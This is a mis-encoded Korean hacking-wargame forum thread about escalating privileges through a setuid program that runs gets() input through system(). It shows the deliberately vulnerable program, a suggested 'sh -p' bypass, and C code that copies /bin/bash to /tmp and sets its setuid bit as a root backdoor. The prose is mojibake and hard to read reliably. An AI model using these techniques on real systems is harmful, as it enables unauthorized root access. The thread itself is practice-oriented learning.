·¹º§ ÇØÅ·

 2844, 1/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   kumi123
   http://blog.naver.com/kumik12
   ±×·³, Æäµµ¶ó ÀÌ»ó±Þ¿¡¼­´Â ( ; , | ) ¸¦ ÀÌ¿ëÇÑ ¿ìȸ°¡ ºÒ°¡´É ÇÑ°¡¿ä?

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3315 [º¹»ç]


suid°¡ °É·ÁÀÖ°í,

ÇÁ·Î±×·¥³»ºÎ¿¡¼­, systemÇÔ¼ö¿¡ ÀԷ¹®ÀÚ¸¦ ¹Þ¾Æ ½ÇÇàÇÏ´Â °æ¿ì

·¹µåÇÞ9 ÀÌÇÏ¿¡¼­´Â ±ÇȯÇ϶ô ¹®Á¦°¡ ¾øÀ¸¹Ç·Î »ó°ü¾øÁö¸¸,

Æäµµ¶ó ÀÌ»ó±Þ¿¡¼­´Â, systemÇÔ¼ö´Â ±ÇȯÇ϶ôÀÌ µÇ¹Ç·Î,

; , | detour¸¦ °á±¹ »ç¿ëÇÒ ¼ö ¾ø´Âµ¥..

¹º°¡ ¿ìȸ ¾ÆÀ̵ð¾î°¡ Á¸Àç Çϳª¿ä?

-------------

¿¹¸¦µé¾î,

int main()
{
char buf[20];
gets(buf);
system(buf);
}

./a
/bin/sh
id ( ´©¸¦½Ã, ±Çȯ»ó½ÂÇÒ ¾ÆÀ̵ð¾î)

  Hit : 2241     Date : 2014/02/03 03:49



    
cd80 Ȥ½Ã system(argv[1]); °°Àº°Å ¸»¾¸ÇϽô°Ÿé
/bin/sh ¿¡ -p ¿É¼Ç ³Ö¾îÁÖ½Ã¸é µË´Ï´Ù~
2014/02/04  
kumi123 À§¿¡ Ãß°¡ÇÑ ¹æ¹ýÀ¸·Î ÇÁ·Î±×·¥À» §´ÙÀ½, /bin/sh -p ¿É¼ÇÀ» ³ÖÀ¸´Ï.. euid º¯È­°¡ ¾ø½À´Ï´Ù. ¤Ð

system ÇÔ¼ö°¡ ³»ºÎ¿¡¼­ ÀÌ¹Ì ±ÇÈ­Ç϶ôÀ» ½ÃŲ´ÙÀ½, ÀÛµ¿Çϱ⠋š¹®¿¡ -p°¡ ¼Ò¿ë¾ø¾î º¸ÀÌ³×¿ä ¤Ð

ÀÌ·¸°Ô ÀÛµ¿Çؼ­ °°Àºµ¥¿ä.. ¤Ð
2014/02/04  
kumi123 execl ÇÔ¼ö·Î ÇÒ°æ¿ì¿¡´Â, ¹Ù·Î euid°¡ ÀâÈ÷³×¿ä ¤Ð¤Ð.

Àú »óÅ¿¡¼­ ¿ìȸ¹æ¹ýÀº ÀÌÁ¦ ¸·Èù°Ç°¡¿ä?
2014/02/04  
cd80 ¾î.. Ȥ½Ã ÇÁ·Î±×·¥»ý¼ºÀÌ °¡´ÉÇÑ È¯°æÀ̸é
main(){
setreuid(geteuid(), geteuid());
system("cp /bin/bash /tmp/bash");
system("chmod +s /tmp/bash");
}
ÇϽŴÙÀ½¿¡ Àú ÇÁ·Î±×·¥À» system()ÀÌ ½ÇÇàÇÏ°Ô ÇÏ°í
/tmp/bash -p ·Î ½ÇÇà½ÃÄѺ¸½Ã¸é µÉ°Í°°¾Æ¿ä
À̰͵µ ¾ÈµÇ³ª..
2014/02/04  
kumi123 ¾ÈµË´Ï´Ù..

systemÇÔ¼ö ½ÇÇà Àü ±ÇȯÇ϶ô -> setreuid ±Çȯ»ó½Â ( °á±¹ µ¿ÀÏ) -> »ý¼º ( »ç¿ëÀÚ id )

°á±¹ ºÒ°¡´ÉÀ̳׿ä.. systemÇÔ¼ö ÀÌÀü¿¡ setuid() ¸¦ Àû¿ë½ÃÅ°Áö ¸øÇÏ´Â ÀÌ»óÀº,

ÇÏÁö¸¸, ¸®¸ðÆ®¾îÅÃ(À¥ÇØÅ·) À̶ó¸é, °¡´ÉÇÒ °ÍÀ̶ó »ý°¢ÇÕ´Ï´Ù.
2014/02/05  
cd80 ¾î ±×·¸³×¿ä ¤»¤» 2014/02/05  
2844   hack the box vpn ¼³Ä¡°¡ ¾È µË´Ï´Ù[2]     jyk5350
07/16 1854
2843   ¿ö°ÔÀÓ¿¡¼­ ½ÇÁ¦ ÇÁ·ÎÁ§Æ®±îÁö À̾îÁö´Â °úÁ¤¿¡ °ü·ÃµÈ Áú¹®[2]     junhee329
04/28 1582
2842   ftz Á¢¼Ó °ü·Ã[1]     pk2861
04/01 1963
2841   level8ÀÇ ÈùÆ®ÆÄÀÏ ÈѼÕ[2]     MunHue
06/05 2187
2840   ·¹º§1ÀÇ /bin/bash ¸í·É¾î....     MunHue
05/15 2340
2839   ftz level4¿¡¼­ finger¸í·É¾î     krimson701
04/20 2455
2838   /bin/bash¿¡ °üÇؼ­[3]     MunHue
04/19 2537
2837   FC10 3¹ø ¹®Á¦ Áú¹®ÀÔ´Ï´Ù.[2]     tjdalstjr938
04/02 2563
2836   ftzÀÌ ¾ÈµÇ¿ä¤Ð¤Ð¤Ð¤Ð¤Ð[1]     ersd145
04/13 3217
2835   fedora core4 cruel Áú¹®[4]     vngkv123
03/29 2665
2834   Fedora core4...[3]     vngkv123
03/28 2676
2833   lob evil_wizard...[2]     vngkv123
03/27 2329
2832   lob gremlin....[1]     vngkv123
03/22 3705
2831   ftz level11 Áú¹®[1]     vngkv123
03/19 2388
2830   pwnable.kr passcode¹®Á¦ Áú¹®...[3]     vngkv123
03/14 2398
2829   ¿ö°ÔÀÓ Á¢ÇÒ ¼ö ÀÖ´Â »çÀÌÆ® ¾Ë·ÁÁÖ¼¼¿ä.[2]     ¿À¼Ò¸®
02/23 3940
2828   ¿ö°ÔÀÓ ±â¹Ý Áö½Ä¿¡ °üÇÑ Áú¹®[1]     salangi11
02/22 2286
2827   ftz Ç®±âÀ§ÇØ ÇÊ¿äÇÑ Áö½ÄÀÌ ±Ã±ÝÇÕ´Ï´Ù.[1]     read1516
01/13 2701
2826   Lob[1]     km1434
12/20 2482
2825   FTZ level4 ½© ¶ç¿ì´Â ¹®Á¦      kimstz0
10/09 2911
1 [2][3][4][5][6][7][8][9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org